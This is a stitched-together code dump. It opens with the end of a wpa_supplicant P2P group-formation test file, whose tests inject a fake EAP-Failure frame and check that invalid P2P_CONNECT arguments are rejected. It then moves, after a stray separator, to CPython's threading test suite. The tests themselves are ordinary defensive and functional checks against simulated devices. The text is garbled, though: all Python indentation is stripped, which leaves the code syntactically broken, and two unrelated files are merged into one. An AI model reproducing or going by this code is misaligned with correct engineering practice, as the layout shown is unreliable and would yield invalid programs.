addr1 = dev[1].p2p_dev_addr()
for i in range(0, 2):
dev[0].request("SET ext_eapol_frame_io 1")
dev[1].request("SET ext_eapol_frame_io 1")
dev[0].p2p_listen()
dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
dev[1].p2p_listen()
dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
go_intent=15, wait_group=False)
mode = None
while True:
ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from GO")
if not mode:
mode = dev[0].get_status_field("mode")
res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from P2P Client")
msg = ev.split(' ')[2]
if msg[46:56] == "102200010f":
logger.info("Drop WSC_Done")
dev[0].request("SET ext_eapol_frame_io 0")
dev[1].request("SET ext_eapol_frame_io 0")
# Fake EAP-Failure to complete session on the client
id = msg[10:12]
dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
break
res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on GO")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on P2P Client")
dev[0].remove_group()
dev[1].wait_go_ending_session()
if mode != "P2P GO - group formation":
raise Exception("Unexpected mode on GO during group formation: " + mode)
def test_grpform_wait_peer(dev):
"""P2P group formation wait for peer to become ready"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
dev[0].request("SET extra_roc_dur 500")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display go_intent=15"):
raise Exception("Failed to initiate GO Neg")
time.sleep(3)
dev[1].request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=0")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].group_form_result(ev)
dev[0].request("SET extra_roc_dur 0")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].remove_group()
def test_invalid_p2p_connect_command(dev):
"""P2P_CONNECT error cases"""
id = dev[0].add_network()
for cmd in [ "foo",
"00:11:22:33:44:55",
"00:11:22:33:44:55 pbc persistent=123",
"00:11:22:33:44:55 pbc persistent=%d" % id,
"00:11:22:33:44:55 pbc go_intent=-1",
"00:11:22:33:44:55 pbc go_intent=16",
"00:11:22:33:44:55 pin",
"00:11:22:33:44:55 pbc freq=0" ]:
if "FAIL" not in dev[0].request("P2P_CONNECT " + cmd):
raise Exception("Invalid P2P_CONNECT command accepted: " + cmd)
if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 1234567"):
raise Exception("Invalid PIN was not rejected")
if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 12345678a"):
raise Exception("Invalid PIN was not rejected")
if "FAIL-CHANNEL-UNSUPPORTED" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 pin freq=3000"):
raise Exception("Unsupported channel not reported")
def test_p2p_unauthorize(dev):
"""P2P_UNAUTHORIZE to unauthorize a peer"""
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE foo"):
raise Exception("Invalid P2P_UNAUTHORIZE accepted")
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE 00:11:22:33:44:55"):
raise Exception("P2P_UNAUTHORIZE for unknown peer accepted")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
pin = dev[0].wps_read_pin()
dev[0].p2p_go_neg_auth(addr1, pin, "display")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_UNAUTHORIZE " + addr1):
raise Exception("P2P_UNAUTHORIZE failed")
dev[1].p2p_go_neg_init(addr0, pin, "keypad", timeout=0)
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=10)
if ev is None:
raise Exception("No GO Negotiation Request RX reported")
def test_grpform_pbc_multiple(dev):
"""P2P group formation using PBC multiple times in a row"""
try:
dev[1].request("SET passive_scan 1")
for i in range(5):
[i_res, r_res] = go_neg_pbc_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
finally:
dev[1].request("SET passive_scan 0")
dev[1].flush_scan_cache()
def test_grpform_not_ready(dev):
"""Not ready for GO Negotiation (listen)"""
addr0 = dev[0].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].global_request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("No P2P-GO-NEG-REQUEST event")
dev[0].dump_monitor()
time.sleep(5)
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer(2)")
for i in range(3):
dev[i].p2p_stop_find()
def test_grpform_not_ready2(dev):
"""Not ready for GO Negotiation (search)"""
addr0 = dev[0].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[0].p2p_find(social=True)
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].global_request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("No P2P-GO-NEG-REQUEST event")
dev[0].dump_monitor()
time.sleep(1)
dev[2].p2p_listen()
ev = dev[0].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
if ev is None:
raise Exception("Peer not discovered after GO Neg Resp(status=1) TX")
if addr2 not in ev:
raise Exception("Unexpected peer discovered: " + ev)
for i in range(3):
dev[i].p2p_stop_find()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import cosmo
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
